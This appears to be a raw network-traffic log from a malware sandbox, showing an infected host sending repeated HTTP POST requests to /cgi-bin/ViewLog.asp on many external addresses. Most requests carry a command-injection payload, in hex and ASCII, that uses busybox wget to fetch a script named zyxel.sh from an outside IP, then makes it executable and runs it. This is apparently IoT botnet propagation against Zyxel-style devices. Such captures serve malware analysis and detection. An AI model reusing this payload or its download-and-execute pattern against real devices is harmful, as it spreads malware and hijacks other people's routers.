Feb 14, 2024 09:31:26.358881950 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:07.317662954 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
831	192.168.2.15	56146	95.47.122.210	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.261374950 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
832	192.168.2.15	57476	95.131.78.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.263752937 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:46.503843069 CET	83	IN	HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked

Session ID	Source IP	Source Port	Destination IP	Destination Port
833	192.168.2.15	57130	94.122.218.48	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.272794962 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
834	192.168.2.15	49700	94.121.20.217	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.273020983 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
835	192.168.2.15	59046	95.46.4.41	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.278323889 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
836	192.168.2.15	41170	85.140.63.22	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.294338942 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
837	192.168.2.15	58256	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.345921993 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:46Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
838	192.168.2.15	46846	94.30.80.81	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.385870934 CET	380	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Server: httpd Date: Wed, 14 Feb 2024 08:30:46 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
839	192.168.2.15	46756	94.250.30.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.405071020 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
840	192.168.2.15	37984	31.136.129.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.465554953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:47.095850945 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:48.343816042 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:51.031848907 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:56.151611090 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:06.135315895 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:26.358906031 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:07.317697048 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
841	192.168.2.15	50230	94.120.153.143	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.508775949 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
842	192.168.2.15	56168	95.47.122.210	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.742276907 CET	380	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Server: httpd Date: Wed, 14 Feb 2024 09:30:12 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
843	192.168.2.15	58302	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:46.870306015 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:46Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
844	192.168.2.15	54322	62.29.7.53	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:47.033832073 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
845	192.168.2.15	58312	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:47.369323015 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:47Auth Result: .
Feb 14, 2024 09:30:47.918256998 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:47Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
846	192.168.2.15	58444	31.136.126.95	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:47.503274918 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:48.183823109 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:49.527859926 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:52.311839104 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.687807083 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:08.439325094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:30.454646111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:13.461453915 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
847	192.168.2.15	54342	31.136.75.240	8080

Timestamp	Bytes transferred	Direction	Data
